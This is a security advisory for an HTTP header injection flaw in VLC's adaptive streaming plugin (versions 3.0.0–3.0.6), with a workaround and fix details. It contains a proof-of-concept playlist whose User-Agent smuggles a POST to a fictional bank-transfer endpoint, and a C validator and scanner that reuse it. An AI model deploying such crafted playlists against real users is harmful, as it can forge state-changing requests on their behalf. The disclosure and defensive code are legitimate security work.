Summary: Insufficient input validation HTTP protocol injection vulnerability
Date: 10 June 2019
Affected versions: VLC 3.0.6 down to 3.0.0
Impact: Arbitrary HTTP requests
CVE ID: unknown/unassigned
ID: VLC Trac bug #20813
For unknown reasons, the VLC media player (and the underlying LibVLC application library) uses a distinct HTTP client implementation to play adaptive network streams such as HTTP Live Streaming (HLS).
Additionally, VLC allows specifying a custom string to use as the HTTP User-Agent header line in HTTP request headers. However, in the case of HTTP adaptive streaming, the custom string is not validated in any way. A malicious network resource can therefore supply an arbitrary byte sequence, including CRLF, and thus inject arbitrary header lines into the normal HTTP GET request, or even complete arbitrary HTTP request headers following the GET request.
If successful, a malicious user could use this vulnerability to craft arbitrary HTTP requests, including non-idempotent, and hence potentially state-changing, requests such as HTTP POST.
An attacker needs to trick the user into opening a crafted playlist manifest.
The only known work-around consists of deleting the adaptive plug-in within the VLC installation, then restarting the application.
The file is normally named libadaptive_plugin.dll, libadaptive_plugin.dylib, or libadaptive_plugin.so depending on the operating system.
Note that this will prevent playing legitimate segmented HTTP streams.
VLC media player version 3.0.7 includes a fix for this issue.
This vulnerability was discovered by Rémi Denis-Courmont, and was not sponsored.
This sample XSPF playlist shows how to set the HTTP User-Agent to inject an HTTP POST request; the user must be tricked into opening it:
<?xml version="1.0" encoding="UTF-8"?>
<playlist xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/" version="1">
  <title>Liste de lecture</title>
  <trackList>
    <track>
      <location>http://www.example.org/stream.m3u8</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
        <vlc:option>http-user-agent=Hacked/0
POST /bank-transfer HTTP/1.1
Host: account.piggy-bank.example.com
Content-Length: 12

Hello world!</vlc:option>
      </extension>
    </track>
  </trackList>
  <extension application="http://www.videolan.org/vlc/playlist/0">
    <vlc:item tid="0"/>
  </extension>
</playlist>
At www.example.org, the following sample manifest can be used to trigger the VLC HTTP adaptive plugin and select the target web server:
#EXTM3U
#EXT-X-PLAYLIST-TYPE:VOD
#EXT-X-TARGETDURATION:10
#EXT-X-VERSION:3
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://account.piggy-bank.example.com/segment0.ts
#EXT-X-ENDLIST
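The following C program is an added example, not VLC code and not part of the original advisory. It illustrates the missing check described above and how the sample playlist could be triaged on the defender's side: a header-value validator that rejects CR, LF and other control characters (the RFC 7230 field-value rule), a GET request builder that fails closed when the User-Agent or Host would break the header framing, and a plain substring scan over XSPF text that counts <vlc:option> values containing line breaks. All function names are assumptions chosen for this example; INJECTED_UA reproduces the User-Agent from the playlist above with its line breaks restored, and SAMPLE_XSPF is a constructed, minimal playlist for the scan.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* True if any byte in s[0..n) is a control character: CR, LF, NUL, DEL or
 * anything else below 0x20 except horizontal tab. */
static bool contains_ctl(const char *s, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if ((c < 0x20 && c != '\t') || c == 0x7F)
            return true;
    }
    return false;
}

/* RFC 7230 field-value: visible ASCII, SP, HTAB, obs-text; never CR or LF.
 * This is the kind of check the adaptive client lacked for the User-Agent. */
bool http_header_value_is_valid(const char *value)
{
    return value != NULL && !contains_ctl(value, strlen(value));
}

/* Build a single GET request into buf. Returns its length, or -1 when the
 * host or User-Agent would break the header framing, when the path contains
 * whitespace or control characters, or when buf is too small. Fails closed:
 * a request with a second request embedded in it is never produced. */
int build_get_request(char *buf, size_t size, const char *host,
                      const char *path, const char *user_agent)
{
    if (!http_header_value_is_valid(host) || !http_header_value_is_valid(user_agent))
        return -1;
    for (const char *p = path; *p != '\0'; p++)
        if ((unsigned char)*p <= 0x20 || (unsigned char)*p == 0x7F)
            return -1;
    int n = snprintf(buf, size, "GET %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\n\r\n",
                     path, host, user_agent);
    return (n < 0 || (size_t)n >= size) ? -1 : n;
}

/* Number of CRLF sequences in a request; a well-formed single request from
 * build_get_request always has exactly 4 (request line, two headers, end). */
int count_crlf(const char *req)
{
    int n = 0;
    for (const char *p = strstr(req, "\r\n"); p != NULL; p = strstr(p + 2, "\r\n"))
        n++;
    return n;
}

/* Defender-side triage of an XSPF playlist: count <vlc:option> values that
 * carry CR/LF or other control characters and would therefore end up as
 * injected header lines. This is a raw substring scan with no entity
 * decoding, enough for the constructed sample below; a production scanner
 * would run a real XML parser first. */
int count_unsafe_options(const char *xspf)
{
    static const char open_tag[] = "<vlc:option>", close_tag[] = "</vlc:option>";
    int unsafe = 0;
    for (const char *p = strstr(xspf, open_tag); p != NULL; p = strstr(p, open_tag)) {
        p += sizeof open_tag - 1;
        const char *end = strstr(p, close_tag);
        if (end == NULL)
            break;
        if (contains_ctl(p, (size_t)(end - p)))
            unsafe++;
        p = end + sizeof close_tag - 1;
    }
    return unsafe;
}

/* The advisory's User-Agent, with the line breaks the flattened playlist
 * text does not show (example constant, not from VLC). */
static const char INJECTED_UA[] =
    "Hacked/0\r\nPOST /bank-transfer HTTP/1.1\r\n"
    "Host: account.piggy-bank.example.com\r\nContent-Length: 12\r\n\r\nHello world!";

/* Constructed minimal XSPF: one benign option and one carrying CRLF. */
static const char SAMPLE_XSPF[] =
    "<playlist><trackList><track><location>http://www.example.org/stream.m3u8</location>"
    "<extension><vlc:option>network-caching=1000</vlc:option>"
    "<vlc:option>http-user-agent=Hacked/0\r\nPOST /bank-transfer HTTP/1.1\r\n\r\n</vlc:option>"
    "</extension></track></trackList></playlist>";

int main(void)
{
    char req[512];
    int n = build_get_request(req, sizeof req, "www.example.org", "/stream.m3u8", INJECTED_UA);
    printf("injected User-Agent: %s\n", n < 0 ? "rejected" : "accepted (bug)");
    n = build_get_request(req, sizeof req, "www.example.org", "/stream.m3u8", "VLC/3.0.7 LibVLC/3.0.7");
    printf("benign User-Agent: %d bytes, %d CRLF\n", n, count_crlf(req));
    printf("unsafe options in sample playlist: %d\n", count_unsafe_options(SAMPLE_XSPF));
    return 0;
}
```

Rejecting the whole request rather than stripping the offending bytes is deliberate: silently sanitising a User-Agent that contains CR/LF would still hide the fact that the playlist tried to smuggle a request, whereas failing closed both blocks the injection and gives the application a clear event to log.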